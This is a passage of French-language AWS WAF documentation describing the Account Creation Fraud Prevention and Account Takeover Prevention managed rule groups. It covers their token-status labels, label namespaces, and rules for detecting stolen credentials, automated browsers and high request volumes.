Ce groupe de règles nécessite une configuration personnalisée, qui inclut la spécification des chemins d'enregistrement et de création de compte de votre application. Sauf indication contraire, les règles de ce groupe de règles inspectent toutes les demandes que vos clients envoient à ces deux points de terminaison. Pour configurer et implémenter ce groupe de règles, consultez les instructions à l'adresse[AWS WAF Contrôle des fraudes : création de comptes, prévention des fraudes (ACFP)](waf-acfp.md). 

**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

Ce groupe de règles fait partie des protections intelligentes d'atténuation des menaces contenues dans AWS WAF. Pour plus d'informations, consultez [Atténuation intelligente des menaces dans AWS WAF](waf-managed-protections.md).

Pour réduire vos coûts et être sûr de gérer votre trafic Web comme vous le souhaitez, utilisez ce groupe de règles conformément aux instructions de[Les meilleures pratiques pour l'atténuation intelligente des menaces dans AWS WAF](waf-managed-protections-best-practices.md).

Ce groupe de règles n'est pas disponible pour les groupes d'utilisateurs Amazon Cognito. Vous ne pouvez pas associer un pack de protection (ACL Web) qui utilise ce groupe de règles à un groupe d'utilisateurs, ni ajouter ce groupe de règles à un pack de protection (ACL Web) déjà associé à un groupe d'utilisateurs.

## Étiquettes ajoutées par ce groupe de règles
<a name="aws-managed-rule-groups-acfp-labels"></a>

Ce groupe de règles géré ajoute des libellés aux requêtes Web qu'il évalue, qui sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 

### Étiquettes à jetons
<a name="aws-managed-rule-groups-acfp-labels-token"></a>

Ce groupe de règles utilise la gestion des AWS WAF jetons pour inspecter et étiqueter les requêtes Web en fonction de l'état de leurs AWS WAF jetons. AWS WAF utilise des jetons pour le suivi et la vérification des sessions client. 

Pour plus d'informations sur les jetons et leur gestion, consultez[Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md).

Pour plus d'informations sur les composants de l'étiquette décrits ici, voir[Syntaxe des étiquettes et exigences de dénomination dans AWS WAF](waf-rule-label-requirements.md).

**Libellé de session client**  
L'étiquette `awswaf:managed:token:id:identifier` contient un identifiant unique que la gestion des AWS WAF jetons utilise pour identifier la session client. L'identifiant peut changer si le client acquiert un nouveau jeton, par exemple après avoir supprimé le jeton qu'il utilisait. 

**Note**  
AWS WAF ne communique pas CloudWatch les statistiques Amazon pour cette étiquette.

**Étiquette d'empreinte digitale du navigateur**  
L'étiquette `awswaf:managed:token:fingerprint:fingerprint-identifier` contient un identifiant d'empreinte digitale robuste que la gestion des AWS WAF jetons calcule à partir de divers signaux du navigateur client. Cet identifiant reste le même lors de plusieurs tentatives d'acquisition de jetons. L'identifiant d'empreinte digitale n'est pas propre à un seul client.

**Note**  
AWS WAF ne communique pas CloudWatch les statistiques Amazon pour cette étiquette.

**Étiquettes d'état des jetons : préfixes d'espace de noms d'étiquettes**  
Les étiquettes d'état du jeton indiquent le statut du jeton ainsi que les informations relatives au défi et au CAPTCHA qu'il contient. 

Chaque étiquette de statut de jeton commence par l'un des préfixes d'espace de noms suivants : 
+ `awswaf:managed:token:`— Utilisé pour signaler l'état général du jeton et pour rendre compte de l'état des informations de défi du jeton. 
+ `awswaf:managed:captcha:`— Utilisé pour rendre compte de l'état des informations CAPTCHA du jeton. 

**Étiquettes d'état des jetons : noms des étiquettes**  
Après le préfixe, le reste de l'étiquette fournit des informations détaillées sur l'état du jeton : 
+ `accepted`— Le jeton de demande est présent et contient les éléments suivants : 
  + Un défi ou une solution CAPTCHA valide.
  + Un défi ou un horodatage CAPTCHA non expiré.
  + Spécification de domaine valide pour le pack de protection (ACL Web). 

  Exemple : L'étiquette `awswaf:managed:token:accepted` indique que le jeton des requêtes Web contient une solution de défi valide, un horodatage de défi non expiré et un domaine valide.
+ `rejected`— Le jeton de demande est présent mais ne répond pas aux critères d'acceptation. 

  Outre l'étiquette rejetée, la gestion des jetons ajoute un espace de noms et un nom d'étiquette personnalisés pour en indiquer la raison. 
  + `rejected:not_solved`— Le challenge ou la solution CAPTCHA ne sont pas présents dans le jeton. 
  + `rejected:expired`— L'horodatage du challenge ou du CAPTCHA du jeton a expiré, conformément aux durées d'immunité des jetons configurées par votre pack de protection (ACL Web). 
  + `rejected:domain_mismatch`— Le domaine du jeton ne correspond pas à la configuration du domaine du jeton de votre pack de protection (ACL Web). 
  + `rejected:invalid`— AWS WAF n'a pas pu lire le jeton indiqué. 

  Exemple : `awswaf:managed:captcha:rejected:expired` ensemble, les `awswaf:managed:captcha:rejected` libellés indiquent que la demande ne comportait pas de résolution CAPTCHA valide car l'horodatage CAPTCHA figurant dans le jeton a dépassé le délai d'immunité du jeton CAPTCHA configuré dans le pack de protection (ACL Web).
+ `absent`— La demande ne contient pas le jeton ou le gestionnaire de jetons n'a pas pu le lire. 

  Exemple : L'étiquette `awswaf:managed:captcha:absent` indique que la demande ne contient pas le jeton. 

### Étiquettes ACFP
<a name="aws-managed-rule-groups-acfp-labels-rg"></a>

Ce groupe de règles génère des étiquettes avec le préfixe d'espace de noms `awswaf:managed:aws:acfp:` suivi de l'espace de noms personnalisé et du nom de l'étiquette. Le groupe de règles peut ajouter plusieurs libellés à une demande. 

Vous pouvez récupérer toutes les étiquettes d'un groupe de règles via l'API en appelant`DescribeManagedRuleGroup`. Les étiquettes sont répertoriées dans la `AvailableLabels` propriété de la réponse. 

## Liste des règles de prévention des fraudes relatives à la création de comptes
<a name="aws-managed-rule-groups-acfp-rules"></a>

Cette section répertorie les règles ACFP `AWSManagedRulesACFPRuleSet` et les étiquettes que les règles du groupe de règles ajoutent aux requêtes Web.

Toutes les règles de ce groupe de règles nécessitent un jeton de requête Web, à l'exception des deux premières `UnsupportedCognitoIDP` et`AllRequests`. Pour une description des informations fournies par le jeton, consultez[AWS WAF caractéristiques du jeton](waf-tokens-details.md). 

Sauf indication contraire, les règles de ce groupe de règles inspectent toutes les demandes que vos clients envoient aux chemins de page d'enregistrement et de création de compte que vous fournissez dans la configuration du groupe de règles. Pour plus d'informations sur la configuration de ce groupe de règles, consultez[AWS WAF Contrôle des fraudes : création de comptes, prévention des fraudes (ACFP)](waf-acfp.md). 

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 


| Nom de la règle | Description et étiquette | 
| --- | --- | 
| UnsupportedCognitoIDP |  Vérifie le trafic Web destiné à un groupe d'utilisateurs Amazon Cognito. L'ACFP n'est pas disponible pour une utilisation avec les groupes d'utilisateurs Amazon Cognito, et cette règle permet de garantir que les autres règles du groupe de règles ACFP ne sont pas utilisées pour évaluer le trafic du groupe d'utilisateurs. Action de la règle Block Étiquettes : `awswaf:managed:aws:acfp:unsupported:cognito_idp` et `awswaf:managed:aws:acfp:UnsupportedCognitoIDP`   | 
| AllRequests |  Applique l'action de la règle aux demandes qui accèdent au chemin de la page d'enregistrement. Vous configurez le chemin de la page d'enregistrement lorsque vous configurez le groupe de règles.  Par défaut, cette règle s'applique Challenge aux demandes. En appliquant cette action, la règle garantit que le client obtient un jeton de défi avant que les demandes ne soient évaluées par les autres règles du groupe de règles.  Assurez-vous que vos utilisateurs finaux chargent le chemin de la page d'inscription avant de soumettre une demande de création de compte.  Les jetons sont ajoutés aux demandes par l'intégration de l'application client SDKs et par les actions de règles CAPTCHA etChallenge. Pour une acquisition de jetons la plus efficace possible, nous vous recommandons vivement d'utiliser l'intégration de l'application SDKs. Pour de plus amples informations, veuillez consulter [Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md).  Action de la règle Challenge Étiquettes : Aucune  | 
| RiskScoreHigh |  Inspecte les demandes de création de compte contenant des adresses IP ou d'autres facteurs considérés comme hautement suspects. Cette évaluation est généralement basée sur plusieurs facteurs contributifs, que vous pouvez voir dans les `risk_score` libellés que le groupe de règles ajoute à la demande. Action de la règle Block Étiquettes : `awswaf:managed:aws:acfp:risk_score:high` et `awswaf:managed:aws:acfp:RiskScoreHigh`  La règle peut également s'appliquer `medium` ou des étiquettes de score de `low` risque à la demande.  Si AWS WAF l'évaluation du score de risque pour la requête Web échoue, la règle ajoute l'étiquette `awswaf:managed:aws:acfp:risk_score:evaluation_failed ` En outre, la règle ajoute des étiquettes avec l'espace de noms `awswaf:managed:aws:acfp:risk_score:contributor:` qui incluent le statut de l'évaluation du score de risque et les résultats pour les contributeurs spécifiques au score de risque, tels que les évaluations de réputation IP et d'informations d'identification volées.  | 
| SignalCredentialCompromised |  Recherche dans la base de données des informations d'identification volées les informations d'identification qui ont été soumises dans la demande de création de compte.  Cette règle garantit que les nouveaux clients initialisent leurs comptes avec une posture de sécurité positive.   Vous pouvez ajouter une réponse de blocage personnalisée, pour décrire le problème à votre utilisateur final et lui indiquer comment procéder. Pour plus d'informations, consultez [Exemple ACFP : réponse personnalisée pour des informations d'identification compromises](waf-acfp-control-example-compromised-credentials.md).  Action de la règle Block Étiquettes : `awswaf:managed:aws:acfp:signal:credential_compromised` et `awswaf:managed:aws:acfp:SignalCredentialCompromised`  Le groupe de règles applique l'étiquette associée suivante, mais ne prend aucune mesure, car les demandes de création de compte ne comporteront pas toutes des informations d'identification : `awswaf:managed:aws:acfp:signal:missing_credential`  | 
| SignalClientHumanInteractivityAbsentLow |  Inspecte le jeton de la demande de création de compte à la recherche de données indiquant une interactivité humaine anormale avec l'application. L'interactivité humaine est détectée par le biais d'interactions telles que les mouvements de la souris et les pressions sur les touches. Si la page comporte un formulaire HTML, l'interactivité humaine inclut les interactions avec le formulaire.   Cette règle inspecte uniquement les demandes relatives au chemin de création du compte et n'est évaluée que si vous avez implémenté l'intégration SDKs de l'application. Les implémentations du SDK capturent passivement l'interactivité humaine et stockent les informations dans le jeton de demande. Pour plus d’informations, consultez [AWS WAF caractéristiques du jeton](waf-tokens-details.md) et [Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md).  Action de la règle CAPTCHA Étiquettes : Aucune. La règle détermine une correspondance en fonction de différents facteurs, de sorte qu'aucune étiquette individuelle ne s'applique à tous les scénarios de correspondance possibles. Le groupe de règles peut appliquer une ou plusieurs des étiquettes suivantes aux demandes :  `awswaf:managed:aws:acfp:signal:client:human_interactivity:low\|medium\|high` `awswaf:managed:aws:acfp:SignalClientHumanInteractivityAbsentLow\|Medium\|High`  `awswaf:managed:aws:acfp:signal:client:human_interactivity:insufficient_data`  `awswaf:managed:aws:acfp:signal:form_detected`.  | 
| AutomatedBrowser |  Vérifie s'il existe des indicateurs indiquant que le navigateur client pourrait être automatisé.  Action de la règle Block  Étiquettes : `awswaf:managed:aws:acfp:signal:automated_browser` et `awswaf:managed:aws:acfp:AutomatedBrowser`  | 
| BrowserInconsistency |  Inspecte le jeton de la demande pour détecter toute incohérence dans les données d'interrogation du navigateur. Pour de plus amples informations, veuillez consulter [AWS WAF caractéristiques du jeton](waf-tokens-details.md). Action de la règle CAPTCHA  Étiquettes : `awswaf:managed:aws:acfp:signal:browser_inconsistency` et `awswaf:managed:aws:acfp:BrowserInconsistency`  | 
| VolumetricIpHigh |  Détecte les volumes élevés de demandes de création de compte envoyées à partir d'adresses IP individuelles. Un volume élevé correspond à plus de 20 demandes dans une fenêtre de 10 minutes.  Les seuils appliqués par cette règle peuvent varier légèrement en raison de la latence. En cas de volume élevé, quelques demandes peuvent dépasser la limite avant que l'action de la règle ne soit appliquée.  Action de la règle CAPTCHA Étiquettes : `awswaf:managed:aws:acfp:aggregate:volumetric:ip:creation:high` et `awswaf:managed:aws:acfp:VolumetricIpHigh`  La règle applique les libellés suivants aux demandes présentant un volume moyen (plus de 15 demandes par fenêtre de 10 minutes) et un faible volume (plus de 10 demandes par fenêtre de 10 minutes), mais ne prend aucune mesure à leur égard : `awswaf:managed:aws:acfp:aggregate:volumetric:ip:creation:medium` et`awswaf:managed:aws:acfp:aggregate:volumetric:ip:creation:low`.  | 
| VolumetricSessionHigh |  Inspecte les volumes élevés de demandes de création de compte envoyées lors de sessions client individuelles. Un volume élevé correspond à plus de 10 demandes dans une fenêtre de 30 minutes.   Les seuils appliqués par cette règle peuvent varier légèrement en raison de la latence. Quelques demandes peuvent dépasser la limite avant que l'action de la règle ne soit appliquée.   Action de la règle Block Étiquettes : `awswaf:managed:aws:acfp:aggregate:volumetric:session:creation:high` et `awswaf:managed:aws:acfp:VolumetricSessionHigh`  Le groupe de règles applique les libellés suivants aux demandes présentant un volume moyen (plus de 5 demandes par fenêtre de 30 minutes) et un volume faible (plus d'une demande par fenêtre de 30 minutes), mais ne prend aucune mesure à leur égard : `awswaf:managed:aws:acfp:aggregate:volumetric:session:creation:medium` et`awswaf:managed:aws:acfp:aggregate:volumetric:session:creation:low`.  | 
| AttributeUsernameTraversalHigh |  Détecte le taux élevé de demandes de création de compte provenant d'une seule session client utilisant des noms d'utilisateur différents. Le seuil pour une évaluation élevée est de plus de 10 demandes en 30 minutes.   Les seuils appliqués par cette règle peuvent varier légèrement en raison de la latence. Quelques demandes peuvent dépasser la limite avant que l'action de la règle ne soit appliquée.   Action de la règle Block Étiquettes : `awswaf:managed:aws:acfp:aggregate:attribute:username_traversal:creation:high` et `awswaf:managed:aws:acfp:AttributeUsernameTraversalHigh`  Le groupe de règles applique les libellés suivants aux demandes présentant un volume moyen (plus de 5 demandes par fenêtre de 30 minutes) et un faible volume (plus d'une demande par fenêtre de 30 minutes) de demandes de traversée de nom d'utilisateur, mais ne prend aucune mesure à leur sujet : `awswaf:managed:aws:acfp:aggregate:attribute:username_traversal:creation:medium` et`awswaf:managed:aws:acfp:aggregate:attribute:username_traversal:creation:low`.  | 
| VolumetricPhoneNumberHigh |  Détecte les volumes élevés de demandes de création de compte utilisant le même numéro de téléphone. Le seuil pour une évaluation élevée est de plus de 10 demandes en 30 minutes.   Les seuils appliqués par cette règle peuvent varier légèrement en raison de la latence. Quelques demandes peuvent dépasser la limite avant que l'action de la règle ne soit appliquée.   Action de la règle Block Étiquettes : `awswaf:managed:aws:acfp:aggregate:volumetric:phone_number:high` et `awswaf:managed:aws:acfp:VolumetricPhoneNumberHigh` Le groupe de règles applique les libellés suivants aux demandes présentant un volume moyen (plus de 5 demandes par fenêtre de 30 minutes) et un volume faible (plus d'une demande par fenêtre de 30 minutes), mais ne prend aucune mesure à leur égard : `awswaf:managed:aws:acfp:aggregate:volumetric:phone_number:medium` et`awswaf:managed:aws:acfp:aggregate:volumetric:phone_number:low`.  | 
| VolumetricAddressHigh |  Détecte les volumes élevés de demandes de création de compte utilisant la même adresse physique. Le seuil pour une évaluation élevée est supérieur à 100 demandes par fenêtre de 30 minutes.   Les seuils appliqués par cette règle peuvent varier légèrement en raison de la latence. Quelques demandes peuvent dépasser la limite avant que l'action de la règle ne soit appliquée.   Action de la règle Block Étiquettes : `awswaf:managed:aws:acfp:aggregate:volumetric:address:high` et `awswaf:managed:aws:acfp:VolumetricAddressHigh`   | 
| VolumetricAddressLow |  Inspecte les volumes faibles et moyens de demandes de création de compte utilisant la même adresse physique. Le seuil pour une évaluation moyenne est supérieur à 50 demandes par fenêtre de 30 minutes, et pour une évaluation faible, il est supérieur à 10 demandes par fenêtre de 30 minutes.  La règle applique l'action aux volumes moyens ou faibles.  Les seuils appliqués par cette règle peuvent varier légèrement en raison de la latence. Quelques demandes peuvent dépasser la limite avant que l'action de la règle ne soit appliquée.   Action de la règle CAPTCHA Étiquettes : `awswaf:managed:aws:acfp:aggregate:volumetric:address:low\|medium` et `awswaf:managed:aws:acfp:VolumetricAddressLow\|Medium`   | 
| VolumetricIPSuccessfulResponse |  Détecte un grand nombre de demandes de création de compte réussies pour une seule adresse IP. Cette règle regroupe les réponses positives de la ressource protégée aux demandes de création de compte. Le seuil pour une évaluation élevée est supérieur à 10 demandes par fenêtre de 10 minutes.  Cette règle permet de se protéger contre les tentatives de création de comptes en masse. Son seuil est inférieur à celui de la règle`VolumetricIpHigh`, qui ne compte que les demandes.  Si vous avez configuré le groupe de règles pour inspecter le corps de la réponse ou les composants JSON, vous AWS WAF pouvez inspecter les 65 536 premiers octets (64 Ko) de ces types de composants pour détecter des indicateurs de réussite ou d'échec.  Cette règle applique l'action et l'étiquetage des règles aux nouvelles requêtes Web provenant d'une adresse IP, en fonction des réponses de réussite et d'échec de la ressource protégée aux récentes tentatives de connexion à partir de la même adresse IP. Vous définissez comment comptabiliser les réussites et les échecs lorsque vous configurez le groupe de règles.   AWS WAF évalue cette règle uniquement dans les packs de protection (Web ACLs) qui protègent les CloudFront distributions Amazon.   Les seuils appliqués par cette règle peuvent varier légèrement en raison de la latence. Il est possible que le client envoie plus de tentatives de création de compte réussies que celles autorisées avant que la règle ne commence à correspondre lors des tentatives suivantes.   Action de la règle Block Étiquettes : `awswaf:managed:aws:acfp:aggregate:volumetric:ip:successful_creation_response:high` et `awswaf:managed:aws:acfp:VolumetricIPSuccessfulResponse`  Le groupe de règles applique également les libellés associés suivants aux demandes, sans aucune action associée. Tous les chiffres sont basés sur une fenêtre de 10 minutes. `awswaf:managed:aws:acfp:aggregate:volumetric:ip:successful_creation_response:medium`pour plus de 5 demandes réussies, `awswaf:managed:aws:acfp:aggregate:volumetric:ip:successful_creation_response:low` pour plus d'une demande réussie, `awswaf:managed:aws:acfp:aggregate:volumetric:ip:failed_creation_response:high` pour plus de 10 demandes ayant échoué, `awswaf:managed:aws:acfp:aggregate:volumetric:ip:failed_creation_response:medium` pour plus de 5 demandes ayant échoué et `awswaf:managed:aws:acfp:aggregate:volumetric:ip:failed_creation_response:low` pour plus d'une demande ayant échoué.   | 
| VolumetricSessionSuccessfulResponse |  Vérifie s'il y a peu de réponses satisfaisantes de la ressource protégée aux demandes de création de compte envoyées à partir d'une seule session client. Cela permet de se protéger contre les tentatives de création de comptes en masse. Le seuil pour une évaluation faible est supérieur à 1 demande par fenêtre de 30 minutes.  Cela permet de se protéger contre les tentatives de création de comptes en masse. Cette règle utilise un seuil inférieur à celui de la règle`VolumetricSessionHigh`, qui suit uniquement les demandes.  Si vous avez configuré le groupe de règles pour inspecter le corps de la réponse ou les composants JSON, vous AWS WAF pouvez inspecter les 65 536 premiers octets (64 Ko) de ces types de composants pour détecter des indicateurs de réussite ou d'échec.  Cette règle applique l'action et l'étiquetage des règles aux nouvelles requêtes Web provenant d'une session client, en fonction des réponses de réussite et d'échec de la ressource protégée aux récentes tentatives de connexion effectuées au cours de la même session client. Vous définissez comment comptabiliser les réussites et les échecs lorsque vous configurez le groupe de règles.   AWS WAF évalue cette règle uniquement dans les packs de protection (Web ACLs) qui protègent les CloudFront distributions Amazon.   Les seuils appliqués par cette règle peuvent varier légèrement en raison de la latence. Il est possible que le client envoie plus de tentatives de création de compte infructueuses que ce qui est autorisé avant que la règle ne commence à correspondre lors des tentatives suivantes.   Action de la règle Block Étiquettes : `awswaf:managed:aws:acfp:aggregate:volumetric:session:successful_creation_response:low` et `awswaf:managed:aws:acfp:VolumetricSessionSuccessfulResponse`  Le groupe de règles applique également les libellés associés suivants aux demandes. Tous les comptes sont basés sur une fenêtre de 30 minutes. `awswaf:managed:aws:acfp:aggregate:volumetric:session:successful_creation_response:high`pour plus de 10 demandes réussies, `awswaf:managed:aws:acfp:aggregate:volumetric:session:successful_creation_response:medium` pour plus de 5 demandes réussies, `awswaf:managed:aws:acfp:aggregate:volumetric:session:failed_creation_response:high` pour plus de 10 demandes ayant échoué, `awswaf:managed:aws:acfp:aggregate:volumetric:session:failed_creation_response:medium` pour plus de 5 demandes ayant échoué et `awswaf:managed:aws:acfp:aggregate:volumetric:session:failed_creation_response:low` pour plus d'une demande ayant échoué.   | 
| VolumetricSessionTokenReuseIp |  Inspecte les demandes de création de compte pour l'utilisation d'un seul jeton parmi plus de 5 adresses IP distinctes.   Les seuils appliqués par cette règle peuvent varier légèrement en raison de la latence. Quelques demandes peuvent dépasser la limite avant que l'action de la règle ne soit appliquée.   Action de la règle Block Étiquettes : `awswaf:managed:aws:acfp:aggregate:volumetric:session:creation:token_reuse:ip` et `awswaf:managed:aws:acfp:VolumetricSessionTokenReuseIp`  | 

# AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)
<a name="aws-managed-rule-groups-atp"></a>

Cette section explique ce que fait le groupe de règles géré par AWS WAF Fraud Control Account Takeover Prevention (ATP).

VendorName:`AWS`, Nom :`AWSManagedRulesATPRuleSet`, WCU : 50

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 

L'ATP ( AWS WAF Fraud Control Account Takeover Prevention) gère les étiquettes des groupes de règles et gère les demandes susceptibles de faire partie de tentatives malveillantes de prise de contrôle de compte. Pour ce faire, le groupe de règles inspecte les tentatives de connexion que les clients envoient au point de terminaison de connexion de votre application. 
+ **Inspection des demandes** — ATP vous donne de la visibilité et un contrôle sur les tentatives de connexion anormales et les tentatives de connexion utilisant des informations d'identification volées, afin d'empêcher les prises de contrôle de comptes susceptibles de mener à des activités frauduleuses. ATP vérifie les combinaisons d'e-mails et de mots de passe par rapport à sa base de données d'identifiants volés, qui est régulièrement mise à jour à mesure que de nouvelles informations d'identification divulguées sont découvertes sur le Dark Web. ATP agrège les données par adresse IP et par session client afin de détecter et de bloquer les clients qui envoient trop de demandes suspectes. 
+ **Inspection des réponses** — Pour les CloudFront distributions, en plus d'inspecter les demandes de connexion entrantes, le groupe de règles ATP inspecte les réponses de votre application aux tentatives de connexion, afin de suivre les taux de réussite et d'échec. À l'aide de ces informations, ATP peut bloquer temporairement les sessions client ou les adresses IP présentant trop d'échecs de connexion. AWS WAF effectue une inspection des réponses de manière asynchrone, afin de ne pas augmenter la latence de votre trafic Web. 

## Considérations relatives à l'utilisation de ce groupe de règles
<a name="aws-managed-rule-groups-atp-using"></a>

Ce groupe de règles nécessite une configuration spécifique. Pour configurer et implémenter ce groupe de règles, consultez les instructions sur[AWS WAF Contrôle des fraudes et prévention des prises de contrôle des comptes (ATP)](waf-atp.md). 

Ce groupe de règles fait partie des protections intelligentes d'atténuation des menaces contenues dans AWS WAF. Pour plus d'informations, consultez [Atténuation intelligente des menaces dans AWS WAF](waf-managed-protections.md).

**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

Pour réduire vos coûts et être sûr de gérer votre trafic Web comme vous le souhaitez, utilisez ce groupe de règles conformément aux instructions de[Les meilleures pratiques pour l'atténuation intelligente des menaces dans AWS WAF](waf-managed-protections-best-practices.md).

Ce groupe de règles n'est pas disponible pour les groupes d'utilisateurs Amazon Cognito. Vous ne pouvez pas associer un pack de protection (ACL Web) qui utilise ce groupe de règles à un groupe d'utilisateurs, ni ajouter ce groupe de règles à un pack de protection (ACL Web) déjà associé à un groupe d'utilisateurs.

## Étiquettes ajoutées par ce groupe de règles
<a name="aws-managed-rule-groups-atp-labels"></a>

Ce groupe de règles géré ajoute des étiquettes aux requêtes Web qu'il évalue, lesquelles sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 

### Étiquettes à jetons
<a name="aws-managed-rule-groups-atp-labels-token"></a>

Ce groupe de règles utilise la gestion des AWS WAF jetons pour inspecter et étiqueter les requêtes Web en fonction de l'état de leurs AWS WAF jetons. AWS WAF utilise des jetons pour le suivi et la vérification des sessions client. 

Pour plus d'informations sur les jetons et leur gestion, consultez[Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md).

Pour plus d'informations sur les composants de l'étiquette décrits ici, voir[Syntaxe des étiquettes et exigences de dénomination dans AWS WAF](waf-rule-label-requirements.md).

**Libellé de session client**  
L'étiquette `awswaf:managed:token:id:identifier` contient un identifiant unique que la gestion des AWS WAF jetons utilise pour identifier la session client. L'identifiant peut changer si le client acquiert un nouveau jeton, par exemple après avoir supprimé le jeton qu'il utilisait. 

**Note**  
AWS WAF ne communique pas CloudWatch les statistiques Amazon pour cette étiquette.

**Étiquette d'empreinte digitale du navigateur**  
L'étiquette `awswaf:managed:token:fingerprint:fingerprint-identifier` contient un identifiant d'empreinte digitale robuste que la gestion des AWS WAF jetons calcule à partir de divers signaux du navigateur client. Cet identifiant reste le même lors de plusieurs tentatives d'acquisition de jetons. L'identifiant d'empreinte digitale n'est pas propre à un seul client.

**Note**  
AWS WAF ne communique pas CloudWatch les statistiques Amazon pour cette étiquette.

**Étiquettes d'état des jetons : préfixes d'espace de noms d'étiquettes**  
Les étiquettes d'état du jeton indiquent le statut du jeton et les informations de défi et de CAPTCHA qu'il contient. 

Chaque étiquette de statut de jeton commence par l'un des préfixes d'espace de noms suivants : 
+ `awswaf:managed:token:`— Utilisé pour signaler l'état général du jeton et pour rendre compte de l'état des informations de défi du jeton. 
+ `awswaf:managed:captcha:`— Utilisé pour rendre compte de l'état des informations CAPTCHA du jeton. 

**Étiquettes d'état des jetons : noms des étiquettes**  
Après le préfixe, le reste de l'étiquette fournit des informations détaillées sur l'état du jeton : 
+ `accepted`— Le jeton de demande est présent et contient les éléments suivants : 
  + Un défi ou une solution CAPTCHA valide.
  + Un défi ou un horodatage CAPTCHA non expiré.
  + Spécification de domaine valide pour le pack de protection (ACL Web). 

  Exemple : L'étiquette `awswaf:managed:token:accepted` indique que le jeton des requêtes Web contient une solution de défi valide, un horodatage de défi non expiré et un domaine valide.
+ `rejected`— Le jeton de demande est présent mais ne répond pas aux critères d'acceptation. 

  Outre l'étiquette rejetée, la gestion des jetons ajoute un espace de noms et un nom d'étiquette personnalisés pour en indiquer la raison. 
  + `rejected:not_solved`— Le challenge ou la solution CAPTCHA ne sont pas présents dans le jeton. 
  + `rejected:expired`— L'horodatage du challenge ou du CAPTCHA du jeton a expiré, conformément aux durées d'immunité des jetons configurées par votre pack de protection (ACL Web). 
  + `rejected:domain_mismatch`— Le domaine du jeton ne correspond pas à la configuration du domaine du jeton de votre pack de protection (ACL Web). 
  + `rejected:invalid`— AWS WAF n'a pas pu lire le jeton indiqué. 

  Exemple : `awswaf:managed:captcha:rejected:expired` ensemble, les `awswaf:managed:captcha:rejected` libellés indiquent que la demande ne comportait pas de résolution CAPTCHA valide car l'horodatage CAPTCHA figurant dans le jeton a dépassé le délai d'immunité du jeton CAPTCHA configuré dans le pack de protection (ACL Web).
+ `absent`— La demande ne contient pas le jeton ou le gestionnaire de jetons n'a pas pu le lire. 

  Exemple : L'étiquette `awswaf:managed:captcha:absent` indique que la demande ne contient pas le jeton. 

### Étiquettes ATP
<a name="aws-managed-rule-groups-atp-labels-rg"></a>

Le groupe de règles géré par ATP génère des étiquettes avec le préfixe d'espace de noms `awswaf:managed:aws:atp:` suivi de l'espace de noms personnalisé et du nom de l'étiquette. 

Le groupe de règles peut ajouter l'une des étiquettes suivantes en plus des étiquettes indiquées dans la liste des règles :
+ `awswaf:managed:aws:atp:signal:credential_compromised`— Indique que les informations d'identification soumises dans la demande se trouvent dans la base de données des informations d'identification volées. 
+ `awswaf:managed:aws:atp:aggregate:attribute:suspicious_tls_fingerprint`— Disponible uniquement pour les CloudFront distributions Amazon protégées. Indique qu'une session client a envoyé plusieurs demandes utilisant une empreinte TLS suspecte. 
+ `awswaf:managed:aws:atp:aggregate:volumetric:session:token_reuse:ip`— Indique l'utilisation d'un seul jeton parmi plus de 5 adresses IP distinctes. Les seuils appliqués par cette règle peuvent varier légèrement en raison de la latence. Quelques demandes peuvent dépasser la limite avant que l'étiquette ne soit appliquée. 

Vous pouvez récupérer toutes les étiquettes d'un groupe de règles via l'API en appelant`DescribeManagedRuleGroup`. Les étiquettes sont répertoriées dans la `AvailableLabels` propriété de la réponse. 

## Liste des règles de prévention du piratage de compte
<a name="aws-managed-rule-groups-atp-rules"></a>

Cette section répertorie les règles ATP `AWSManagedRulesATPRuleSet` et les étiquettes que les règles du groupe de règles ajoutent aux requêtes Web.

**Note**  
